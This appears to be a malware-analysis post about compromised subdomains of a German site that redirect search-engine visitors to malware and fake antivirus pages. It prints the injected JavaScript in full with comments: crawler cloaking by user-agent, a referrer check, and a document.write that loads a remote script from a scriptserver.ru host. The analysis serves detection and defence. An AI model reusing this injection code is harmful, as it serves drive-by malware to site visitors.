A few subdomains of ausbildung-passgenau.de host pages that, when visited from a search engine results page (so there’s a certain document referrer), redirect to a randomised pick of malware, fake anti-virus and advertising sites.
Interestingly, it looks like only pages at the subdomains are infected. These are a few of the subdomains:
- fullfilescenter.ausbildung-passgenau.de
- newfiles2016.ausbildung-passgenau.de
- fastwindows2016.ausbildung-passgenau.de
This Google search results page will show any of the links in action:
https://www.google.co.uk/search?q=site:ausbildung-passgenau.de
This is the JavaScript doing the dirty work:
<script type="text/javascript">
// Captured sample, kept byte-for-byte; the comments are analysis notes only.
//
// Step 1 - user-agent gate. If the browser's user-agent string contains any of
// these substrings, Break() is called. Break is not defined anywhere in this
// excerpt, so the call presumably throws a ReferenceError and stops the rest of
// the script (confirm against the full page). "Yaho" also matches "Yahoo", and
// the "Google" test already covers "Googlebot". Net effect: clients that
// identify as these search engines never reach the injection below.
(0 <= window.navigator.userAgent.indexOf("Rambler")
|| 0 <= window.navigator.userAgent.indexOf("Yandex")
|| 0 <= window.navigator.userAgent.indexOf("Google")
|| 0 <= window.navigator.userAgent.indexOf("Yaho")
|| 0 <= window.navigator.userAgent.indexOf("Googlebot")
|| 0 <= window.navigator.userAgent.indexOf("Turtle")) && Break();
// Step 2 - referrer gate. An empty referrer (direct visit, bookmark, or a
// scanner that sends no Referer header) skips the whole block, so fetching the
// URL directly will not reproduce the behaviour.
var ref = document.referrer;
if (ref.length != 0) {
// The tests are plain substring matches anywhere in the referrer URL, not
// hostname checks; "> 0" only excludes a match at position 0. The yandex
// branch additionally requires "text=" to be present.
// showme is not declared in this excerpt. Short-circuit evaluation means it is
// only read when every referrer test has failed; if it is undeclared at that
// point, the read throws and nothing is injected. Presumably a manual override
// set elsewhere on the page - verify.
if ((ref.indexOf("yandex.") > 0 && ref.indexOf("text=") > 0)
|| (ref.indexOf("google.") > 0)
|| ref.indexOf("rambler.") > 0
|| ref.indexOf("bing.") > 0
|| ref.indexOf("mail.") > 0
|| ref.indexOf("yahoo.") > 0
|| ref.indexOf("msn.") > 0
|| ref.indexOf("live.") > 0
|| ref.indexOf("vk.") > 0
|| showme == 'force') {
// Step 3 - injection. Writes a <script> element into the document whose src
// is a plain-http URL on a scriptserver.ru subdomain. The tag name is split
// as 'sc' + 'ript' so the literal text "</script>" never appears inside this
// inline block (it would end the block early); the split may also defeat naive
// string signatures. The contents of index_download.js are not shown here; the
// redirects described on this page presumably come from that file.
document.write('<sc' + 'ript type="text/javascript" src="http://d2gyAAiuYBY2TUpxpe.scriptserver.ru/indianajones/index_download.js"></sc' + 'ript>');
}
}
</script>